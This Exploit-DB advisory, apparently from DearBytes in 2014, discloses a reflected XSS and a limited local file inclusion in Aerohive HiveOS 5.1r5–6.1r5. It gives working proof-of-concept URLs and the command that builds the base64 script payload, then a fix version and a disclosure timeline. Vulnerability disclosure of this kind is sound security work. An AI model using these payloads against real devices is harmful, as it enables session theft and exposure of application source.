Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities

EDB-ID:

34038

CVE:


EDB Verified:

Author:

DearBytes

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2014-07-12

Vulnerable App: 
# Exploit Title: Aerohive HiveOS XSS and (limited) LFI
# Date: 11-07-2014
# Exploit Author: Rik van Duijn - DearBytes (dearbytes.com)
# Vendor Homepage: http://www.aerohive.com/products/overview.html
# Version: 5.1r5 - 6.1r5 (possibly earlier versions)

Description
================
Aerohive version 5.1r5 through 6.1r5 contain two vulnerabilities, one reflective XSS vulnerability and a limited local file inclusion vulnerability (I was only able to view source from one specific folder, maybe you can leverage this further). 
It's possible earlier version are affected, I was only able to review 5.1r5 briefly, the vendor indicated other version up to 6.1r5 are vulnerable as well.

Details
================
AeroHive  HiveOS Version:  5.1r5 until 6.1r5 (maybe available in earlier versions, was unable to test)
 
 
Vulnerability
================
An attacker could craft an URL in order to steal a session or attack the system of the visitor to the URL. The LFI can be leveraged to view application source code, limited to one specific folder.

 
Proof of concept XSS
====================
Base: http://<IP>/index.php5?ERROR_INFO=<BASE64 ENCODED JAVASCRIPT/HTML>
echo -en '"><script>alert('XSS');</script>' | base64
Add the output to the ERROR_INFO variable.

Example:
http://<IP>/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+

Proof of concept LFI
====================
Base: http://<IP>/action.php5?_action=get&_actionType=1&_page=<LFI>

Example:
http://<IP>/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP


Fix
================
The vulnerabilities were resolved in version 6.1r5.
 
 
Disclosure Timeline
================
 
2014-03-12: Reported to vendor
2014-03-12: Vendor confirmed, gave tracking-id
2014-03-18: Vendor confirms issues, states it received the vulns earlier and is already addressing the issues.
2014-04-02: Requested status update
2014-04-02: Vendor indicates they once the new version is released
2014-07-07: Requested status update
2014-07-07: Vendor indicated the update was previously published
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services